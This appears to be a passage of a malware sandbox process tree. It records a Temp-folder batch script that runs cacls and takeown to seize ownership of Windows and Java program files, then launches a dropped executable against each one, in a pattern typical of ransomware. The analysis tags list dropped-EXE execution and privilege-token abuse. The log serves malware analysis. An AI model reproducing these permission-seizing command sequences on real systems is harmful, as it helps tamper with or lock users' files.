C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""2⤵PID:3904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:2500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:2820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "classes.jsa" -nobanner3⤵PID:1972
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4252
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:3504
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:3212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:3808
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4448
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:4480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:2432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:3872
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:3592
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:1696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wab.exe" -nobanner3⤵PID:4576
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""2⤵PID:5020
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4380
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:776
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""2⤵PID:3132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:3160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:2832
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""2⤵PID:4640
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:2784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4216
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4404
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:3276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4536
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1172
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4468
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""2⤵PID:1388
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1888
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:3948
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""2⤵PID:4488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1116
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""2⤵PID:4500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C3⤵PID:3392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "BrowserCore.exe.mui" -nobanner3⤵PID:2432
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "BrowserCore.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4888
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""2⤵PID:3472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1896
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4876
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:1452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:2324
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4764
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""2⤵PID:5056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4572
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4380
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""2⤵PID:3656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C3⤵PID:284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "manifest.json" -nobanner3⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "manifest.json" -nobanner4⤵
- Executes dropped EXE
PID:1232
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""2⤵PID:5088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:244
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:3168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4440
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:2584
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:2332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:2104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵PID:460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wabmig.exe" -nobanner3⤵PID:4848
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:1608
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""2⤵PID:3004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:1172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:3584
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4476
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""2⤵PID:4684
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C3⤵PID:1840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"3⤵
- Modifies file permissions
PID:4804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "BrowserCore.exe" -nobanner3⤵PID:4400
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "BrowserCore.exe" -nobanner4⤵
- Executes dropped EXE
PID:4280
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""2⤵PID:2980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:2852
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:4756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:5032
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4472
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:1268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:3904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
PID:4584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:4976
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
- Executes dropped EXE
PID:3208
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""2⤵PID:4896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:3592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:4480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:2724
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:2744
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""2⤵PID:4744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:3872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:2212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:2476
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:2120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
PID:4316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:3328
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4996
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""2⤵PID:4380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:2840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:2952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:284
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:304
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""2⤵PID:1104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:2812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:3132
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:332
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:4440
-
